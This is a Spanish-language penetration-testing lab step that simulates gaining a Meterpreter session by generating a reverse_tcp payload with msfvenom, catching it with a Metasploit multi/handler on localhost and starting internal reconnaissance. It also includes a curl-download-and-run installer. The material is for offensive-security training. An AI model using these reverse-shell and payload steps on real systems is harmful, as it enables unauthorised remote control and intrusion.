Identificar un servicio en la red interna de un objetivo
En este paso, simularemos la obtención de una sesión de Meterpreter en una máquina objetivo. En un escenario real, esto se lograría explotando una vulnerabilidad. Para este laboratorio, configuraremos un listener en Metasploit y ejecutaremos manualmente una carga útil (payload) para conectarnos a él. Esto nos permitirá centrarnos en la fase de post-explotación.
Primero, necesitamos instalar el Metasploit Framework.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
A continuación, abra una terminal e inicie la consola de Metasploit.
msfconsole -q
Dentro de msfconsole, configuraremos un manejador (handler) para escuchar las conexiones entrantes.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Ahora, abra una nueva terminal (puede usar el botón "+" en la pestaña de la terminal). En esta nueva terminal, generaremos y ejecutaremos una carga útil para conectarnos de vuelta a nuestro listener.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
Vuelva a su primera terminal con msfconsole. Debería ver un mensaje indicando que se ha abierto una nueva sesión. Interactuemos con ella.
sessions -l
sessions -i 1
Ahora se encuentra en una sesión de Meterpreter. Un primer paso común es realizar reconocimiento. Verifiquemos las interfaces de red del host "comprometido".
ifconfig
Verá varias interfaces de red. Para este laboratorio, asumiremos que, a través de un escaneo adicional (que está fuera del alcance de este laboratorio), hemos descubierto un servicio web ejecutándose en 127.0.0.1 en el puerto 8080. Nuestro objetivo es acceder a este servicio.